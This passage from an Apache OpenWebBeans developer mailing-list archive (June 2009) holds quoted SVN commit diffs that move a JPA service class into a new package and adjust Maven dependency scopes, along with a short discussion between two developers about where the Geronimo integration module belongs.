incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties >=20 > Modified: > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > URL: http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-g= eronimo/pom.xml?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > --- incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > (original) > +++ incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > Thu Jun 18 19:51:03 2009 > @@ -43,13 +43,14 @@ > =A0 =A0 =A0 =A0=A0=A0<dependency> > =A0 =A0 =A0 =A0 =A0 > =A0=A0=A0<groupId>junit</groupId> > =A0 =A0 =A0 =A0 =A0 > =A0=A0=A0<artifactId>junit</artifactId> > +=A0 =A0 =A0 =A0 =A0 =A0 > <scope>test</scope> > =A0 =A0 =A0 =A0=A0=A0</dependency> > =20 > =A0 =A0 =A0 =A0=A0=A0<dependency> > =A0 =A0 =A0 =A0 =A0 > =A0=A0=A0<groupId>org.apache.openejb</groupId> > =A0 =A0 =A0 =A0 =A0 > =A0=A0=A0<artifactId>openejb-core</artifactId> > +=A0 =A0 =A0 =A0 =A0 =A0 > <scope>provided</scope> > <!--=A0 =A0 =A0 =A0 =A0 =A0 > <version>3.1.1-SNAPSHOT</version>--> > -=A0 =A0 =A0 =A0 =A0 =A0 > <version>3.0.1</version> > =A0 =A0 =A0 =A0=A0=A0</dependency> > =20 > =A0 =A0 =A0 =A0=A0=A0<dependency> >=20 > Copied: > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > (from r782277, > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java) > URL: http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-g= eronimo/src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpen= EJBImpl.java?p2=3Dincubator/openwebbeans/trunk/webbeans-geronimo/src/main/j= ava/org/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java&p1=3D= incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/web= beans/spi/ee/openejb/JPAServiceOpenEJBImpl.java&r1=3D782277&r2=3D786229&rev= =3D786229&view=3Ddiff > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > --- > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > (original) > +++ > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > Thu Jun 18 19:51:03 2009 > @@ -11,7 +11,7 @@ > =A0 * KIND, either express or implied. See the License > for the specific language > =A0 * governing permissions and limitations under the > License. > =A0 */ > -package org.apache.webbeans.spi.ee.openejb; > +package org.apache.webbeans.spi.ee.openejb.jpa; > =20 > import javax.enterprise.inject.CreationException; > import javax.naming.Context; >=20 > Modified: > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > URL: http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-g= eronimo/src/test/java/org/apache/webbeans/test/geronimo/openejb/OpenEJBInte= grationTest.java?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > --- > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > (original) > +++ > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > Thu Jun 18 19:51:03 2009 > @@ -23,7 +23,7 @@ > import junit.framework.Assert; > =20 > import org.apache.webbeans.jpa.spi.JPAService; > -import > org.apache.webbeans.spi.ee.openejb.JPAServiceOpenEJBImpl; > +import > org.apache.webbeans.spi.ee.openejb.jpa.JPAServiceOpenEJBImpl; > import org.junit.Test; > =20 > =20 >=20 > Modified: > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > URL: http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-g= eronimo/src/test/resources/META-INF/openwebbeans/openwebbeans.properties?re= v=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > --- > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > (original) > +++ > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > Thu Jun 18 19:51:03 2009 > @@ -36,7 +36,7 @@ >=20 > org.apache.webbeans.spi.TransactionService=3Dorg.apache.webbeans.spi.ee.T= ransactionServiceJndiImpl > =20 > # use the JPAService which retrieves the > PersistenceManagerFactory from the Persistence class as > default=20 > -org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= JPAServiceOpenEJBImpl > +org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= jpa.JPAServiceOpenEJBImpl > =20 > #use the web metadata as default >=20 > org.apache.webbeans.spi.deployer.MetaDataDiscoveryService=3Dorg.apache.we= bbeans.spi.ee.deployer.WarMetaDataDiscoveryImpl >=20 >=20 > =0A=0A=0A From [email protected] Fri Jun 19 11:00:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8443 invoked from network); 19 Jun 2009 11:00:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 11:00:54 -0000 Received: (qmail 63573 invoked by uid 500); 19 Jun 2009 11:01:05 -0000 Delivered-To: [email protected] Received: (qmail 63542 invoked by uid 500); 19 Jun 2009 11:01:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63532 invoked by uid 99); 19 Jun 2009 11:01:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 11:01:04 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 11:00:56 +0000 Received: by ewy20 with SMTP id 20so2056923ewy.12 for <[email protected]>; Fri, 19 Jun 2009 04:00:35 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=MK0ev9CvfssL6WB4UNKKTq6W09RAoKnGDFidNjALjS0=; b=XO0/yHAl661rGkOSCQ68L0Pmj3ECAMiOM+7sb+f60Je6NynO9VWemH7munBQuSXhX9 BoXmzMSKv3NqsPyocYagVm9rMKQE5RlF7a9cZBOBA5Xqikm0gnz1C6YaJyj6qxahIYkE yt4hehiU940HPVn72s+ehCmqceuE1JT/0eNK4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=GkhL+y+cj5n/zvS41eYEtln/7gSNa3AgtTXE1QSllqS1NQ99ZCoHlOWKTDltn3Mu// VPZCbz/cQqOLhqIZULQ3YrSsSv6qoqnhYRqeJWBKCoILhGJcEAIhC5VhR7YNNKS6R6c5 xB3/4sOE3eAAY2vRANURG35bGi1sLg9eXUu74= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id d10mr527136ebd.14.1245409234991; Fri, 19 Jun 2009 04:00:34 -0700 (PDT) Date: Fri, 19 Jun 2009 14:00:34 +0300 Message-ID: <[email protected]> Subject: Re: svn commit: r786229 - in /incubator/openwebbeans/trunk/webbeans-geronimo: ./ src/main/java/org/apache/webbeans/spi/ee/openejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/ejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/ src/test/ja From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174bdc700d39a5046cb16f45 X-Virus-Checked: Checked by ClamAV on apache.org --0015174bdc700d39a5046cb16f45 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Hi Mark, Thanks for giving your concerns. I put *ejb* package here because EJB integration will be very specific to a= n application server. I think that it is very hard to write *generic spi* fo= r ejb that we can implement for multiple containers. Thanks; --Gurkan 2009/6/19 Mark Struberg <[email protected]> > > Hi Gurkan! > > The webbeans-geronimo package is a bit of a compromise. > > The whole geronimo integration should really been done on the geronimo > side, but it is simply too early and would cause too much effort now for > this step. So I started this package here to have all in one place so we = can > test and get it stable and later hand it over to the geronimo guys. > > The reason why I don't think this module should stay there is geronimos > lifecycle. This is a chicken egg problem with dependencies. Clearly geron= imo > uses us and we use openejb. So we may have different branches for differe= nt > openejb versions to integrate. But the integration into geronimo should > finally been done on the geronimo side imho. > > I write this, so all have a common understanding what this module was > originally intended for. > > lieGrue, > strub > > --- [email protected] <[email protected]> schrieb am Do, 18.6.2009: > > > Von: [email protected] <[email protected]> > > Betreff: svn commit: r786229 - in > /incubator/openwebbeans/trunk/webbeans-geronimo: ./ > src/main/java/org/apache/webbeans/spi/ee/openejb/ > src/main/java/org/apache/webbeans/spi/ee/openejb/ejb/ > src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/ src/test/java/org..= . > > An: [email protected] > > Datum: Donnerstag, 18. Juni 2009, 21:51 > > Author: gerdogdu > > Date: Thu Jun 18 19:51:03 2009 > > New Revision: 786229 > > > > URL: http://svn.apache.org/viewvc?rev=3D786229&view=3Drev > > Log: > > Adding package for EJB stuff. Maybe we can add EJB > > integration code here. > > > > Added: > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/ejb/ > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/ > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > - copied, changed from r782277, > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > Removed: > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > Modified: > > > > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > > > Modified: > > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > URL: > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-geroni= mo/pom.xml?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > --- incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > (original) > > +++ incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > Thu Jun 18 19:51:03 2009 > > @@ -43,13 +43,14 @@ > > <dependency> > > > > <groupId>junit</groupId> > > > > <artifactId>junit</artifactId> > > + > > <scope>test</scope> > > </dependency> > > > > <dependency> > > > > <groupId>org.apache.openejb</groupId> > > > > <artifactId>openejb-core</artifactId> > > + > > <scope>provided</scope> > > <!-- > > <version>3.1.1-SNAPSHOT</version>--> > > - > > <version>3.0.1</version> > > </dependency> > > > > <dependency> > > > > Copied: > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > (from r782277, > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java) > > URL: > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-geroni= mo/src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBIm= pl.java?p2=3Dincubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/o= rg/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java&p1=3Dincub= ator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/webbeans= /spi/ee/openejb/JPAServiceOpenEJBImpl.java&r1=3D782277&r2=3D786229&rev=3D78= 6229&view=3Ddiff > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > --- > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > (original) > > +++ > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > Thu Jun 18 19:51:03 2009 > > @@ -11,7 +11,7 @@ > > * KIND, either express or implied. See the License > > for the specific language > > * governing permissions and limitations under the > > License. > > */ > > -package org.apache.webbeans.spi.ee.openejb; > > +package org.apache.webbeans.spi.ee.openejb.jpa; > > > > import javax.enterprise.inject.CreationException; > > import javax.naming.Context; > > > > Modified: > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > URL: > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-geroni= mo/src/test/java/org/apache/webbeans/test/geronimo/openejb/OpenEJBIntegrati= onTest.java?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > --- > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > (original) > > +++ > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > Thu Jun 18 19:51:03 2009 > > @@ -23,7 +23,7 @@ > > import junit.framework.Assert; > > > > import org.apache.webbeans.jpa.spi.JPAService; > > -import > > org.apache.webbeans.spi.ee.openejb.JPAServiceOpenEJBImpl; > > +import > > org.apache.webbeans.spi.ee.openejb.jpa.JPAServiceOpenEJBImpl; > > import org.junit.Test; > > > > > > > > Modified: > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > URL: > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-geroni= mo/src/test/resources/META-INF/openwebbeans/openwebbeans.properties?rev=3D7= 86229&r1=3D786228&r2=3D786229&view=3Ddiff > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > --- > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > (original) > > +++ > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > Thu Jun 18 19:51:03 2009 > > @@ -36,7 +36,7 @@ > > > > > org.apache.webbeans.spi.TransactionService=3Dorg.apache.webbeans.spi.ee.T= ransactionServiceJndiImpl > > > > # use the JPAService which retrieves the > > PersistenceManagerFactory from the Persistence class as > > default > > > -org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= JPAServiceOpenEJBImpl > > > +org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= jpa.JPAServiceOpenEJBImpl > > > > #use the web metadata as default > > > > > org.apache.webbeans.spi.deployer.MetaDataDiscoveryService=3Dorg.apache.we= bbeans.spi.ee.deployer.WarMetaDataDiscoveryImpl > > > > > > > > > > --=20 Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174bdc700d39a5046cb16f45-- From [email protected] Fri Jun 19 11:35:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15986 invoked from network); 19 Jun 2009 11:35:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 11:35:13 -0000 Received: (qmail 12366 invoked by uid 500); 19 Jun 2009 11:35:24 -0000 Delivered-To: [email protected] Received: (qmail 12340 invoked by uid 500); 19 Jun 2009 11:35:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12330 invoked by uid 99); 19 Jun 2009 11:35:24 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 11:35:24 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 19 Jun 2009 11:35:12 +0000 Received: (qmail 49833 invoked by uid 60001); 19 Jun 2009 11:34:50 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1245411290; bh=XYnXdHO/o4A78MTInDrbsOc8W6MdXKG582au03c6Zqc=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ji+BSCBcNKtJd5xa/ln7jL05i/SvlwmZwe4/pWbigiwH56HlW2JSoAUu0tvJQp1uJcGY8rFABvpM+sTJyt5dQf5RrMEdxkCex5QQc1z0xevcrTCNTnmbb9fP0xn4Tc3qv6i1gksCzAg5A6yUiLHfLl4ko65YdRJ42depaJpEVBM= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=0ISSaymT2jpdG5KX7BfLq/dE+mf0gpMtBVHJax1yrXR6ykP/0fsvuLpfEK1Si8RT+JxeVUayBiq+i+pRErqiYW21Fpt7JE265BSQma4VQJq+9OSLZWXbGPAWrX2ygCjzAMfWW9trIqutzL0deKP/6TLAm95elQ0GjrvajgA4OUc=; Message-ID: <[email protected]> X-YMail-OSG: dlIILboVM1mU1WkrcDF8ESWdkjmwdFhVm5LVlAg8sT94xV3aqrwdYBpmHOOpK7VU9IVHQZWE3HpM0KaF.Mm1jKTUzL27860m4NgFzYAdsKBSUes.zpG8DAP9auvN9KRY6EVkuxDvP9ZxmHPEkKGxRCWyU03SVZ1bNUemcY4EBeBKF1QJvkpi236IOTe_zgntAOSS1ueT.if_gA8rTkqW805PeI1F9NZZ3WKjiqR.MEyKbaSZYloTCiiR3T3p5fdy8XdbH8ZfHvHK6NkzDSjE8JOq6iXtVWoimoZszsWDfo1hfhw1LyztRjfW_zXzK7nOE.aQC5OFGmwqURwhXMtyLElVbrqbHbjlCSYTMFg_MKI- Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Fri, 19 Jun 2009 11:34:49 GMT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Fri, 19 Jun 2009 11:34:49 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: svn commit: r786229 - in /incubator/openwebbeans/trunk/webbeans-geronimo: ./ src/main/java/org/apache/webbeans/spi/ee/openejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/ejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/ src/test/ja To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Oki, if it turns out to be reusable, we can still slice it into an own modu= le later on. LieGrue, strub --- Gurkan Erdogdu <[email protected]> schrieb am Fr, 19.6.2009: > Von: Gurkan Erdogdu <[email protected]> > Betreff: Re: svn commit: r786229 - in /incubator/openwebbeans/trunk/webbe= ans-geronimo: ./ src/main/java/org/apache/webbeans/spi/ee/openejb/ src/mai= n/java/org/apache/webbeans/spi/ee/openejb/ejb/ src/main/java/org/apache/we= bbeans/spi/ee/openejb/jpa/ src/test/ja > An: [email protected] > Datum: Freitag, 19. Juni 2009, 13:00 > Hi Mark, >=20 > Thanks for giving your concerns. >=20 > I put *ejb* package here because EJB integration will be > very specific to an > application server.=A0 I think that it is very hard to > write *generic spi* for > ejb that we can implement for multiple containers. >=20 > Thanks; >=20 > --Gurkan >=20 >=20 > 2009/6/19 Mark Struberg <[email protected]> >=20 > > > > Hi Gurkan! > > > > The webbeans-geronimo package is a bit of a > compromise. > > > > The whole geronimo integration should really been done > on the geronimo > > side, but it is simply too early and would cause too > much effort now for > > this step. So I started this package here to have all > in one place so we can > > test and get it stable and later hand it over to the > geronimo guys. > > > > The reason why I don't think this module should stay > there is geronimos > > lifecycle. This is a chicken egg problem with > dependencies. Clearly geronimo > > uses us and we use openejb. So we may have different > branches for different > > openejb versions to integrate. But the integration > into geronimo should > > finally been done on the geronimo side imho. > > > > I write this, so all have a common understanding what > this module was > > originally intended for. > > > > lieGrue, > > strub > > > > --- [email protected] > <[email protected]> > schrieb am Do, 18.6.2009: > > > > > Von: [email protected] > <[email protected]> > > > Betreff: svn commit: r786229 - in > > /incubator/openwebbeans/trunk/webbeans-geronimo: ./ > > src/main/java/org/apache/webbeans/spi/ee/openejb/ > > src/main/java/org/apache/webbeans/spi/ee/openejb/ejb/ > > src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/ > src/test/java/org... > > > An: [email protected] > > > Datum: Donnerstag, 18. Juni 2009, 21:51 > > > Author: gerdogdu > > > Date: Thu Jun 18 19:51:03 2009 > > > New Revision: 786229 > > > > > > URL: http://svn.apache.org/viewvc?rev=3D786229&view=3Drev > > > Log: > > > Adding package for EJB stuff. Maybe we can add > EJB > > > integration code here. > > > > > > Added: > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/ejb/ > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/ > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > >=A0 =A0 =A0=A0=A0- copied, changed > from r782277, > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > > Removed: > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > > Modified: > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > > > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > > > > > Modified: > > > > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > > URL: > > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-gero= nimo/pom.xml?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > > > > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > > --- > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > > (original) > > > +++ > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > > > Thu Jun 18 19:51:03 2009 > > > @@ -43,13 +43,14 @@ > > >=A0 =A0 =A0 =A0 =A0 > <dependency> > > > > > >=A0 =A0 > <groupId>junit</groupId> > > > > > >=A0 =A0 > <artifactId>junit</artifactId> > > > + > > > <scope>test</scope> > > >=A0 =A0 =A0 =A0 =A0 > </dependency> > > > > > >=A0 =A0 =A0 =A0 =A0 > <dependency> > > > > > >=A0 =A0 > <groupId>org.apache.openejb</groupId> > > > > > >=A0 =A0 > <artifactId>openejb-core</artifactId> > > > + > > > <scope>provided</scope> > > >=A0 <!-- > > > > <version>3.1.1-SNAPSHOT</version>--> > > > - > > > <version>3.0.1</version> > > >=A0 =A0 =A0 =A0 =A0 > </dependency> > > > > > >=A0 =A0 =A0 =A0 =A0 > <dependency> > > > > > > Copied: > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > > (from r782277, > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java) > > > URL: > > 